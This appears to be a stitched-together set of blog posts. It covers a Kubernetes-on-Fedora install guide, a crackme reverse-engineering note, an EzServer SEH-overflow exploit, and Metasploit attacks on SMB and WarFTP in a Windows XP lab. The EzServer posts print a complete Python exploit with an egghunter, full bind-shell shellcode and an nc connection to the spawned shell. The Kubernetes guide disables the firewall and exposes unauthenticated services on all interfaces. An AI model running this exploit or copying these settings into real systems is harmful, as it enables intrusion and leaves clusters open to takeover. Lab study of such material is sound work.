SCX020C06A

Tutorial: Installing Kubernetes on Windows


Kubernetes Tutorial for Windows
The tutorial documentation on the Kubernetes site says that to try Kubernetes you must use Linux or Mac OS, so on Windows we will install Fedora Linux in VirtualBox manually, without using Vagrant.

VM Setup

  1. Download VirtualBox
Install it as usual.
2. Download & install the Fedora OS image in VirtualBox
Create two virtual machines named “fed-master” and “fed-node”.
Follow this tutorial to install Fedora >> http://linuxpitstop.com/install-fedora-22-workstation-on-virtualbox/
But when it asks you to download the image, download the server-21 version here >>
If asked for a root password, use root.
After installation, shut down the VM, then go to Settings and, in the Network section, add a new Host-Only adapter.
Don't forget to uncheck the disk before starting the VM.

Installing & Configuring Kubernetes

After installing the 2 VMs, we will follow the documentation at http://kubernetes.io/v1.1/docs/getting-started-guides/fedora/fedora_manual_config.html
SETTINGS FOR FED-MASTER & FED-NODE
Once the VM has booted you will be asked to log in; enter root as the user and root as the password. Then type the command in the box below and wait for the download to finish.

yum -y install kubernetes docker-io
Additional packages for fed-master

yum -y install etcd iptables
  • Set the IP address: 192.168.121.9 for fed-master and 192.168.121.65 for fed-node.

ip addr add 192.168.121.9/24 dev enp0s8
ip link set enp0s8 up
  • Save the IPs to the /etc/hosts file

echo "192.168.121.9  fed-master
192.168.121.65 fed-node" >> /etc/hosts
  • Edit the file /etc/kubernetes/config
To edit this file we will use nano. Open the file:

nano /etc/kubernetes/config
Once it is open, find the “KUBE_MASTER” entry and change http://127.0.0.1:8080 to http://fed-master:8080.
After editing, press “Ctrl+x”, then “y” and Enter to save the file.
Edit this file on both the master and node VMs.
  • Disable the firewall
Type the commands below to disable the firewall so that it does not interfere with Kubernetes connections.

systemctl disable iptables-services firewalld
systemctl stop iptables-services firewalld

SETTINGS FOR FED-MASTER

The settings below are applied on the fed-master VM.
  • Edit /etc/kubernetes/apiserver
Edit it with nano as in the example above. Change the line as shown below.

# The address on the local server to listen to.
KUBE_API_ADDRESS="--insecure-bind-address=0.0.0.0"
  • Edit /etc/etcd/etcd.conf
Same as above: change localhost to 0.0.0.0

ETCD_LISTEN_CLIENT_URLS="http://0.0.0.0:2379"
  • Create the /var/run/kubernetes directory

mkdir /var/run/kubernetes
chown kube:kube /var/run/kubernetes
chmod 750 /var/run/kubernetes
If you get an error saying the file already exists, skip this step.
  • Start the Kubernetes services

for SERVICES in etcd kube-apiserver kube-controller-manager kube-scheduler; do
   systemctl restart $SERVICES
   systemctl enable $SERVICES
   systemctl status $SERVICES
done
If you typed everything correctly you will see active (running), which means it succeeded.
  • Add the node to fed-master
We will create a node.json file containing information about the node that Kubernetes will use.
Run the command ‘nano ~/node.json’, then type in the file contents as follows:

{
    "apiVersion": "v1",
    "kind": "Node",
    "metadata": {
        "name": "fed-node",
        "labels": { "name": "fed-node-label" }
    },
    "spec": {
        "externalID": "fed-node"
    }
}
  • Create the node object

kubectl create -f ~/node.json

SETTINGS FOR FED-NODE

The settings below are applied on the fed-node VM.
  • Edit /etc/kubernetes/kubelet

###
# Kubernetes kubelet (node) config
# The address for the info server to serve on (set to 0.0.0.0 or "" for all interfaces)
KUBELET_ADDRESS="--address=0.0.0.0"
# You may leave this blank to use the actual hostname
KUBELET_HOSTNAME="--hostname-override=fed-node"
# location of the api-server
KUBELET_API_SERVER="--api-servers=http://fed-master:8080"
  • Start the services on fed-node

for SERVICES in kube-proxy kubelet docker; do
   systemctl restart $SERVICES
   systemctl enable $SERVICES
   systemctl status $SERVICES
done
If successful, all three services will be active.

Finally, test the node status from fed-master

kubectl get nodes
If the status is ‘Ready’, the master has successfully connected to the node.

Running a Docker image on the cluster.

  1. Generate key

openssl genrsa -out /tmp/serviceaccount.key 2048
2. Edit the file /etc/kubernetes/apiserver and change:

KUBE_API_ARGS="--service_account_key_file=/tmp/serviceaccount.key"
3. Edit the file /etc/kubernetes/controller-manager and change:

KUBE_CONTROLLER_MANAGER_ARGS="--service_account_private_key_file=/tmp/serviceaccount.key"
4. Restart service

systemctl restart kube-controller-manager.service

Run Image.


kubectl run nginx --image=nginx --replicas=2 --port=9000
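
The settings written in this tutorial expose the API server, etcd and the kubelet on every interface over plain HTTP, and keep the service-account key under /tmp. The Python 3 sketch below is an added example, not part of the original tutorial or the Kubernetes guide; it scans those config lines and reports each such setting. The function names and rule set are illustrative assumptions, and the sample text is constructed from the lines shown above.

```python
import re
ALL_IFACES = {"0.0.0.0", "::"}

# Constructed input: the settings this tutorial writes, keyed by file path.
SAMPLE = {
    "/etc/kubernetes/apiserver":
        'KUBE_API_ADDRESS="--insecure-bind-address=0.0.0.0"\n'
        'KUBE_API_ARGS="--service_account_key_file=/tmp/serviceaccount.key"\n',
    "/etc/etcd/etcd.conf": 'ETCD_LISTEN_CLIENT_URLS="http://0.0.0.0:2379"\n',
    "/etc/kubernetes/kubelet":
        'KUBELET_ADDRESS="--address=0.0.0.0"\n'
        'KUBELET_HOSTNAME="--hostname-override=fed-node"\n'
        'KUBELET_API_SERVER="--api-servers=http://fed-master:8080"\n',
    "/etc/kubernetes/controller-manager": 'KUBE_CONTROLLER_MANAGER_ARGS='
        '"--service_account_private_key_file=/tmp/serviceaccount.key"\n',
}

def parse_env(text):
    """Yield (variable, value) pairs from KEY="value" lines, skipping comments."""
    for line in text.splitlines():
        m = re.match(r'\s*([A-Z_][A-Z0-9_]*)=(.*)$', line)
        if m:
            yield m.group(1), m.group(2).strip().strip('"')

def classify(token):
    """Return a finding string for one flag or URL token, or None if it is fine."""
    name, _, arg = token.partition("=") if token.startswith("--") else ("", "", token)
    flag = name.lstrip("-").replace("_", "-")
    url = re.match(r"http://([^:/]+)", arg)
    if flag == "insecure-bind-address" and arg in ALL_IFACES:
        return "unauthenticated API port bound to all interfaces"
    if flag == "address" and arg in ALL_IFACES:
        return "listener bound to all interfaces"
    if url:
        where = "listener on all interfaces" if url.group(1) in ALL_IFACES else "connection"
        return "plaintext http " + where
    if "key" in flag and arg.startswith("/tmp/"):
        return "key file stored under world-writable /tmp"

def audit(files):
    """Return sorted (path, variable, finding) tuples for every risky setting."""
    out = []
    for path, text in files.items():
        for var, value in parse_env(text):
            out += [(path, var, f) for f in map(classify, value.split()) if f]
    return sorted(out)

if __name__ == "__main__":
    for path, var, finding in audit(SAMPLE):
        print(f"{path}: {var}: {finding}")
```

To check a real host, pass `audit()` a dict built by reading the same four files from disk.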
--Done--

Learning RE with HAWKE

In this post I will walk through some simple reverse engineering with an app called HAWKE,
which you can download from here.


  1. Sandwich.app


    This simple Objective-C application asks for a simple serial code. After disassembly I found the validate class. The pseudocode for this class is below:
    The important part is :
    LOBYTE(eax) = 0x19c5 - (SAR(sum, 0x2)) == index3 ? 0x1 : 0x0;
    SAR is shift arithmetic right. It means index3 must equal 0x19c5 minus sum shifted right by 2, for which I can write simple Python code.


  1. Unicorn.app

  1. Fox.app

  1. Socks.app


Software Exploitation : Ezserver Using Egghunter

Exploit : Ezserver using Egghunter

In the last post I showed the way to exploit Ezserver to open the calculator app. It was a great PoC, but there is a problem: we can't send our payload to the ESP register. The space there is too small for our shellcode, but the buffer is huge. The technique now is to use an egghunter. An egghunter is a piece of code that searches for our shellcode anywhere in memory: it looks for the “keyword” and, once the keyword is found, executes the code that follows it.
In this post I will use egghunter code from skape and from this website.
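
Seen from the defender's side, this mechanism leaves a recognisable shape in a request: the egg is a 4-byte tag written twice in a row, and the hunter carries the same tag once more as an immediate value. The Python 3 sketch below is an added example, not code from the original post; the function names, the 32-byte NOP-run threshold and both sample requests are constructed for illustration.

```python
# Constructed sample: NOP filler, a doubled tag, four breakpoint bytes and a
# second copy of the tag after 0xB8 (mov eax, imm32). It holds no shellcode.
SUSPECT = (b"GET /" + b"\x90" * 64 + b"w00tw00t" + b"\xcc" * 4
           + b"\x90" * 100 + b"\xb8w00t" + b"\x90" * 20)
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"

def longest_run(data, byte=0x90):
    """Length of the longest run of one byte value (0x90 is the x86 NOP)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == byte else 0
        best = max(best, cur)
    return best

def find_eggs(data, tag_len=4):
    """Return (tag, egg_offset, other_offsets) for every tag that appears
    doubled (the egg) and at least once more on its own (the hunter's copy)."""
    hits = []
    for i in range(len(data) - 2 * tag_len + 1):
        tag = data[i:i + tag_len]
        # Skip padding such as AAAA or NOPs, and anything that is not doubled.
        if len(set(tag)) == 1 or data[i + tag_len:i + 2 * tag_len] != tag:
            continue
        others, j = [], data.find(tag)
        while j != -1:
            if j + tag_len <= i or j >= i + 2 * tag_len:  # outside the egg
                others.append(j)
            j = data.find(tag, j + 1)
        if others:
            hits.append((tag, i, others))
    return hits

def inspect_request(data, nop_threshold=32):
    """Summarise one request body; the threshold is an assumption to tune."""
    eggs = find_eggs(data)
    nops = longest_run(data)
    return {"length": len(data), "nop_run": nops, "eggs": eggs,
            "suspicious": bool(eggs) or nops >= nop_threshold}

if __name__ == "__main__":
    for name, req in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, inspect_request(req))
```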

So here is our plan for the fuzzer

[+] How it works

- Previously we filled our buffer with "A"s; now we will fill it with our shellcode and adjust it so that it still fits the EIP offset.
5884 - 100 - 352 = 5432 bytes

- Our shellcode with "w00tw00t" prepended
8 + 344 = 352 bytes

- Egghunter code




[+] Try the hunter

- Next, check whether the egghunter code works by using \xCC to stop the execution of our application in the debugger.

- Open OllyDbg and attach it to the Ezserver application.
- Run the script below with our \xcc and adjusted alignment.

import socket

awalan="\x90" * (5784 - 12)
cece=("w00tw00t" +"\xcc\xcc\xcc\xcc") 
buffer = "\x90" * 100  
offset="\xeb\x06\x90\x90"
popret="\x96\x96\x20\x10" 
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
akhiran="\x90" * (250 - len(egghunt)) 

LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((LHOST,LPORT))
sock.send( awalan+ cece + buffer + offset + popret + nopsled + egghunt + akhiran )
print ("[+] Buffer send success..\n")
sock.close()


- Pass the exception in Olly and wait a few seconds; then it hits our \xcc.



- This means our egghunter code is running and it successfully finds our code, in this case four "\xCC".

[+] Connecting

- So far our code is running okay; now we will use a Windows bind shell as our payload, on port 4444.
- Here is my final code.

#!/usr/bin/python
import socket, sys, os
from time import sleep

print "\n ================================= "
print " >      EZServer SEH Overflow    <"
print " >         Written by aldo       <" 
print " >           i-s-2-c             <"
print " =================================\n"

awalan="\x90" * (5784 - 352) #len(payload)
payload=("w00tw00t" +
"\xdb\xd3\xba\xd2\x1b\x8d\xdf\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5f"
"\x31\x57\x17\x03\x57\x17\x83\x3d\xe7\x6f\x2a\x3d\x72\x9b\x98\x55"
"\x7a\xa4\xdc\x5a\x1d\xd0\x4f\x80\xfa\x6d\xca\xf4\x89\x0e\xd0\x7c"
"\x8f\x01\x51\x33\x97\x56\x39\xeb\xa6\x83\x8f\x60\x9c\xd8\x11\x98"
"\xec\x1e\x88\xc8\x8b\x5f\xdf\x17\x55\x95\x2d\x16\x97\xc1\xda\x23"
"\x43\x32\x0b\x26\x8e\xb1\x14\xec\x51\x2d\xcc\x67\x5d\xfa\x9a\x28"
"\x42\xfd\x77\xd5\x56\x76\x0e\xb5\x82\x94\x70\x86\xfa\x7f\x16\x83"
"\xbe\x4f\x5c\xd3\x4c\x3b\x12\xcf\xe1\xb0\x93\xe7\xa7\xae\x9d\xb9"
"\x59\xc3\xf2\xba\xb0\x7d\xa0\x22\x55\xb1\x74\xc2\xd2\xc6\x4a\x4d"
"\x49\xd6\x7b\x19\xba\xc5\x80\xe2\x6c\xe9\xaf\x4b\x04\xf0\x36\xf2"
"\xfb\xf3\xb4\xa1\x69\x06\x46\x99\x06\xdf\xb1\xec\x7a\x88\x3e\xd8"
"\xd6\x64\x92\xb7\x8b\xc9\x47\x74\x7f\x31\xb7\x1c\x17\xdc\x64\x86"
"\xb4\x57\x75\xd3\x53\xcc\x6c\xab\x64\x5b\x6e\x9d\x01\x74\xc1\x74"
"\x29\xa4\x89\xd2\x78\x6b\xa3\x4d\x7c\xa2\x60\x24\x7d\x9b\xef\x23"
"\xc8\x9a\xb9\xfc\x34\x74\x69\x56\x9f\x2c\x75\x86\x8c\xa7\x6e\x5f"
"\x75\x4e\x26\x60\xaf\xe4\x37\x4e\x36\x6d\xac\x08\xdf\x12\x41\x5d"
"\xfa\xbf\xc9\x04\x2c\x8c\x63\x51\x44\x48\xfd\x7f\xa8\x90\x0e\xd5"
"\x35\x52\xdc\xd7\x88\x7f\x8d\xaa\x77\xb8\x1a\x1f\x2c\xd0\x2e\xa1"
"\x80\x37\x30\x28\xa3\xc8\x18\x89\x7c\x65\xf4\x7c\xd2\xe3\xf7\x2f"
"\x85\xa6\xa6\x30\xf5\x21\xe4\x17\xf3\x7f\xa5\x58\x2a\x15\xb5\x59"
"\xe4\x15\x99\x2e\x5c\x16\x99\xf4\x07\x19\x48\xa6\x38\x35\x1d\x38"
"\x1f\x54\xad\x97\x60\x4f\xad\xc7")  # size 344 + 8 = 352 
buffer = "\x90" * 100     #align the stack (subtracted from awalan: 5884 | 100)
offset="\xeb\x06\x90\x90"  #jmp 6 byte
popret="\x96\x96\x20\x10"  #SEH position -> eip
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") #32 byte egghunter
akhiran="\x90" * (250 - len(egghunt)) 

LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
try:
 sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 sock.connect((LHOST,LPORT))
 sock.send(awalan+ payload + buffer + offset + popret + nopsled + egghunt + akhiran )
 print ("[+] Buffer send success..\n")
 sock.close()
 print "[+] Wait for hatch (0)..\n"
 sleep(5)
 print "[+] Connecting...\n"
 sleep(9)
 os.system("nc -n %s 4444" %LHOST)
except:
 print "[-] Could not connect to %s on port %d\n" % (LHOST,LPORT)
 sys.exit(0) 



- Run Ezserver application.


- The running script.


- Win.

Software Exploitation : Ezserver

Today we are going to exploit an application named Ezserver. Ezhometech Ezserver is a simple HTTP server that serves web pages requested by clients.
We will be using Windows XP SP3 English in VirtualBox.


[*] Information gathering

 - The app uses port 8000; here is the result from nmap:
8000/tcp open  http-alt
- The web interface uses HTML with heavy JavaScript.

 [*] Fuzzing

- Create a simple fuzzer for requests to Ezserver.

- Send a buffer of "A"s: the first try with 1000 leaves Ezserver still up; the second try, times ten to 10,000 A's, crashes Ezserver. OK, next step.

[*] Debug

- Now we will try to find out what happened to Ezserver when it crashed. In this step I will use Immunity Debugger. First open Immunity and attach it to Ezserver.
- Don't forget to run it; next we will send our fuzzer again.


- The registers ESP, ESI and EDI are filled with our A's. Immunity asks us to pass the exception to the application.



- And our EIP and SEH chain are also hit by "\x41".
- Now that we know we can hit EIP, we can find the EIP offset using a pattern from pattern_create 10000, sent with our fuzzer.




- Now the value is 336f4832, and using pattern_offset we find our offset: "5888".
- Next we will confirm it with deadbeef.


- The SEH chain is now DEADBEEF. Next we try to bypass SEH using a POP POP RETN sequence.

- We search in Ezserver's own DLL, MSVCRTD.dll, and the address is 10209696 = "\x96\x96\x20\x10"

- We just toggle the breakpoint to see whether the address is reached.




After we toggle the breakpoint, we will run the fuzzer.




EIP successfully goes to our intended address for POP POP RETN; now we can bypass SEH.

[*] Exploit






- Here is the diagram I drew to show how we will try to open the “Calculator” app.
- First is the buffer, which is 5888 bytes long.
- Our buffer is filled with 5884 bytes of “A” and our short jump code. The short jump code is \xEB\x06, where 06 means 6 bytes. Because I use a 32-bit register, we add 2 NOPs = \x90\x90.
- Next is our payload, and we use a Metasploit payload for executing a command.




- Here is the payload for calc.exe.

- And here is our last fuzzer. Let's run it.

- And it looks like we've done it.

- In the next post we will try to send our shellcode using an egghunter!

Try to exploit SMB and WarFTP in Win XP

Today's task is to exploit the SMB service and War-FTP on Windows XP. First, SMB.

Run Nmap against the remote host.
Port 21/tcp   open  ftp          WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
And the Samba service is turned on.
Now use the Metasploit Framework. Search for smb.
Using ms07_029_msdns_zonename, which apparently doesn't work with Windows XP.
Switch to ms08_067_netapi, set the remote IP, and exploit.
And we are in.
 


Next is warftp,
First, search Metasploit, which finds 2 matches: warftpd_165_user and warftpd_165_pass.


Then use warftpd_165_pass and set the remote host IP.
Exploit, but no luck; switch to warftpd_165_user.
Exploit, and an error occurs: "Exploit failed: A target has not been selected."
A quick Google search shows the answer is to set the target.


 Set the target to 3, Windows XP SP3


Run the exploit, but it sends me a "connection was refused" error. Then I check VirtualBox: WarFTP has crashed from the previous attempt, so I rerun it and start the FTP daemon.
Re-exploit and done, we are in again.
Thank you for reading.